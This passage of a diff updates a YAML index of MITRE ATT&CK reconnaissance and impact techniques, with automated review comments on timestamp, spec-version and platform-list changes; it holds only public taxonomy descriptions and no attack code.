adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56571,7 +57258,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
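Review bot: T1595.003 loses `spec_version: '2.1'` here but keeps `x_mitre_attack_spec_version: 2.1.0`, whereas every other technique in this diff that was on 2.1.0 ends up on 3.2.0 (T1593.003 similarly stays on 3.0.0). This most likely reflects the upstream object not having been re-versioned rather than an index bug, but it is worth confirming the source bundle really reports 2.1.0 for this object, since a stale cached entry would produce the same diff.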
@@ -56593,7 +57279,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56609,12 +57295,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -56683,7 +57367,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
PHISHING. Retrieved February 2, 2023.
@@ -56731,31 +57415,12 @@ reconnaissance:
url: https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.001:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
- type: attack-pattern
- created: '2020-10-02T16:54:23.193Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1595.001
- url: https://attack.mitre.org/techniques/T1595/001
- - source_name: Botnet Scan
- url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
- description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
- a Botnet. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:46:55.039Z'
name: Scanning IP Blocks
description: |-
Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.
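Review bot: the key reorder in this hunk (`x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `external_references` all deleted from the top of the T1595.001 block, to return further down in a different order) is churn that hides the substantive changes. If this file is regenerated from the upstream STIX bundle, say so in the PR description so reviewers can skip the reorder. Separately, `spec_version: '2.1'` is dropped with no replacement here and in the hunks below; confirm nothing that consumes the index reads that key.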
@@ -56764,19 +57429,41 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Diego Sappa, Securonix
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120
+ created: '2020-10-02T16:54:23.193Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1595/001
+ external_id: T1595.001
+ - source_name: Botnet Scan
+ description: Dainotti, A. et al. (2012). Analysis of a “/0” Stealth Scan from
+ a Botnet. Retrieved October 20, 2020.
+ url: https://www.caida.org/publications/papers/2012/analysis_slash_zero/analysis_slash_zero.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1590.001:
technique:
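Review bot: the substantive change for T1595.001 is the new `'Network Traffic: Network Traffic Content'` data source, the `x_mitre_contributors` entry and the bump to `x_mitre_version: '1.1'`, which is consistent with the `modified` date moving to 2024-10-15 in the hunk above. Note that `x_mitre_deprecated: false` and `revoked: false` are newly emitted here; any consumer filtering on those keys will only see them on regenerated entries, so downstream filters should treat an absent key as `false`.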
@@ -56834,7 +57521,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1596.005:
technique:
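Review bot: T1590.001 keeps `x_mitre_attack_spec_version: 2.1.0` while `spec_version` is removed, whereas neighbouring techniques move to `3.2.0`; that mix is plausible if the upstream bundle really carries different spec versions per object, but it is worth confirming the generator is not reading partly stale objects.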
@@ -56855,7 +57541,7 @@ reconnaissance:
- source_name: Shodan
url: https://shodan.io
description: Shodan. (n.d.). Shodan. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:49:49.260Z'
name: Scan Databases
description: |-
Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan)
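Review bot: `modified` moves backwards here, from `2022-04-25T14:00:00.188Z` to `2021-04-15T03:49:49.260Z`. The old value shares its `14:00:00.188Z` suffix with several other entries in this patch, so it reads as a release-wide batch stamp rather than the object's own modification time; if the new values are the per-object timestamps from the upstream STIX data this is a correction, but a `modified` date that goes backwards should be called out in the commit message so nobody reads it as a regression. The same pattern recurs for T1591.001, T1598.001, T1491.002, T1499.001 and T1561 below.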
@@ -56871,8 +57557,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.001:
technique:
@@ -56898,7 +57582,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.025Z'
name: Determine Physical Locations
description: |-
Adversaries may gather the victim's physical location(s) that can be used during targeting. Information about physical locations of a target organization may include a variety of details, including where key resources and infrastructure are housed. Physical locations may also indicate what legal jurisdiction and/or authorities the victim operates within.
@@ -56914,8 +57598,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.001:
technique:
@@ -56939,7 +57621,7 @@ reconnaissance:
url: https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/
description: 'O''Donnell, L. (2020, October 20). Facebook: A Top Launching
Pad For Phishing Attacks. Retrieved October 20, 2020.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:43:12.843Z'
name: Spearphishing Service
description: |-
Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56961,13 +57643,11 @@ reconnaissance:
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
impact:
T1561.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:32:05.064Z'
name: Disk Structure Wipe
description: "Adversaries may corrupt or wipe the disk data structures on a
hard drive necessary to boot a system; targeting specific critical systems
@@ -57059,13 +57739,12 @@ impact:
url: https://www.symantec.com/connect/blogs/shamoon-attacks
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1498.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:54:49.943Z'
name: Direct Network Flood
description: |-
Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well.
@@ -57074,7 +57753,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
@@ -57091,17 +57769,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Sensor Health: Host Status'
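Review bot: this hunk drops `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` from the T1498.001 platform list and bumps `x_mitre_version` from `'1.3'` to `'1.4'`. Narrowing the platforms changes which per-platform index files list this technique, so the platform-specific indexes must be regenerated in the same change, and anyone mapping detections by platform should expect Direct Network Flood to disappear from the SaaS and Google Workspace views.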
@@ -57126,7 +57799,8 @@ impact:
url: https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491.002:
technique:
@@ -57164,7 +57838,7 @@ impact:
description: 'Marco Balduzzi, Ryan Flores, Lion Gu, Federico Maggi, Vincenzo
Ciancaglini, Roel Reyes, Akira Urano. (n.d.). A Deep Dive into Defacement:
How Geopolitical Events Trigger Web Attacks. Retrieved April 19, 2019.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:37.539Z'
name: External Defacement
description: 'An adversary may deface systems external to an organization in
an attempt to deliver messaging, intimidate, or otherwise mislead an organization
@@ -57198,12 +57872,10 @@ impact:
- 'Network Traffic: Network Traffic Content'
x_mitre_impact_type:
- Integrity
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1499.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:51.289Z'
name: OS Exhaustion Flood
description: |-
Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.
@@ -57268,42 +57940,127 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
- T1499.003:
+ T1485.001:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
+ modified: '2024-10-16T21:27:02.481Z'
+ name: Lifecycle-Triggered Deletion
+ description: "Adversaries may modify the lifecycle policies of a cloud storage
+ bucket to destroy all objects stored within. \n\nCloud storage buckets often
+ allow users to set lifecycle policies to automate the migration, archival,
+ or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation:
+ GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor
+ has sufficient permissions to modify these policies, they may be able to delete
+ all objects at once. \n\nFor example, in AWS environments, an adversary with
+ the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle`
+ API call to apply a lifecycle policy to an S3 bucket that deletes all objects
+ in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition
+ to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657),
+ adversaries may also perform this action on buckets storing cloud logs for
+ [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation:
+ Datadog S3 Lifecycle CloudTrail Logs)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Storage: Cloud Storage Modification'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--1001e0d6-ee09-4dfc-aa90-e9320ffc8fe4
+ created: '2024-09-25T13:16:14.166Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1485/001
+ external_id: T1485.001
+ - source_name: AWS Storage Lifecycles
+ description: AWS. (n.d.). Managing the lifecycle of objects. Retrieved September
+ 25, 2024.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-lifecycle-mgmt.html
+ - source_name: GCP Storage Lifecycles
+ description: Google Cloud. (n.d.). Object Lifecycle Management. Retrieved
+ September 25, 2024.
+ url: https://cloud.google.com/storage/docs/lifecycle
+ - source_name: Azure Storage Lifecycles
+ description: Microsoft Azure. (2024, July 3). Configure a lifecycle management
+ policy. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/storage/blobs/lifecycle-management-policy-configure?tabs=azure-portal
+ - source_name: Palo Alto Cloud Ransomware
+ description: 'Ofir Balassiano and Ofir Shaty. (2023, November 29). Ransomware
+ in the Cloud: Breaking Down the Attack Vectors. Retrieved September 25,
+ 2024.'
+ url: https://www.paloaltonetworks.com/blog/prisma-cloud/ransomware-data-protection-cloud/
+ - source_name: Datadog S3 Lifecycle CloudTrail Logs
+ description: Stratus Red Team. (n.d.). CloudTrail Logs Impairment Through
+ S3 Lifecycle Rule. Retrieved September 25, 2024.
+ url: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1496.003:
+ technique:
+ modified: '2024-10-16T17:45:14.210Z'
+ name: SMS Pumping
+ description: |-
+ Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
+
+ Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
type: attack-pattern
- created: '2020-02-20T15:35:00.025Z'
+ id: attack-pattern--130d4494-b2d6-4040-bcea-6e59f05222fe
+ created: '2024-09-25T13:53:19.586Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1499.003
- url: https://attack.mitre.org/techniques/T1499/003
- - source_name: Arbor AnnualDoSreport Jan 2018
- url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
- Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
- into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
- Infrastructure Security Report. Retrieved April 22, 2019.
- - source_name: Cisco DoSdetectNetflow
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1496/003
+ external_id: T1496.003
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Twilio SMS Pumping
+ description: Twilio. (2024, April 10). What Is SMS Pumping Fraud and How to
+ Stop It. Retrieved September 25, 2024.
+ url: https://www.twilio.com/en-us/blog/sms-pumping-fraud-solutions
+ - source_name: Twilio SMS Pumping Fraud
+ description: Twilio. (n.d.). What is SMS Pumping Fraud?. Retrieved September
+ 25, 2024.
+ url: https://www.twilio.com/docs/glossary/what-is-sms-pumping-fraud
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1499.003:
+ technique:
+ modified: '2024-10-15T15:41:49.168Z'
name: Application Exhaustion Flood
description: 'Adversaries may target resource intensive features of applications
to cause a denial of service (DoS), denying availability to those applications.
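Review bot: this hunk adds two new sub-techniques, T1485.001 (Lifecycle-Triggered Deletion) and T1496.003 (SMS Pumping), both with `x_mitre_detection: ''` and `atomic_tests: []`, and at the same time deletes the T1499.003 block that is re-added further down; splitting the additions from the reorder would make it reviewable. For T1485.001 the description names the `PutBucketLifecycle` API call and the only data source is `'Cloud Storage: Cloud Storage Modification'`; since the detection field is empty upstream, defenders relying on this index get no detection guidance from it and will need to alert on lifecycle-policy changes from their own cloud audit logs. For T1496.003 the only data source is `'Application Log: Application Log Content'`, which matches the description's point that the abuse arrives through ordinary OTP and verification web forms.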
@@ -57314,13 +58071,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
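Review bot: T1499.003's platform list is now `Windows`, `IaaS`, `Linux`, `macOS` with `x_mitre_version` bumped to `'1.3'`; the deleted block in the hunk above also listed `Azure AD`, `Office 365`, `SaaS` and `Google Workspace`, so this is the same platform narrowing already applied to T1498.001 and should be mentioned together with it in the commit message.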
@@ -57328,12 +58092,33 @@ impact:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--18cffc21-3260-437e-80e4-4ab8bf2ba5e9
+ created: '2020-02-20T15:35:00.025Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1499/003
+ external_id: T1499.003
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
+ - source_name: Arbor AnnualDoSreport Jan 2018
+ description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
+ Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
+ into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
+ Infrastructure Security Report. Retrieved April 22, 2019.
+ url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1561:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-20T18:16:41.942Z'
name: Disk Wipe
description: |-
Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.
@@ -57394,109 +58179,79 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1565.001:
technique:
+ modified: '2024-08-26T16:33:33.982Z'
+ name: Stored Data Manipulation
+ description: |-
+ Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
+
+ Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'File: File Modification'
+ - 'File: File Creation'
+ - 'File: File Deletion'
+ x_mitre_impact_type:
+ - Integrity
type: attack-pattern
id: attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292
created: '2020-03-02T14:22:24.410Z'
- x_mitre_version: '1.1'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.001
url: https://attack.mitre.org/techniques/T1565/001
+ external_id: T1565.001
- source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
description: Department of Justice. (2018, September 6). Criminal Complaint
- United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
- source_name: FireEye APT38 Oct 2018
- url: https://content.fireeye.com/apt/rpt-apt38
description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
November 6, 2018.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries may insert, delete, or manipulate data at rest in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
-
- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
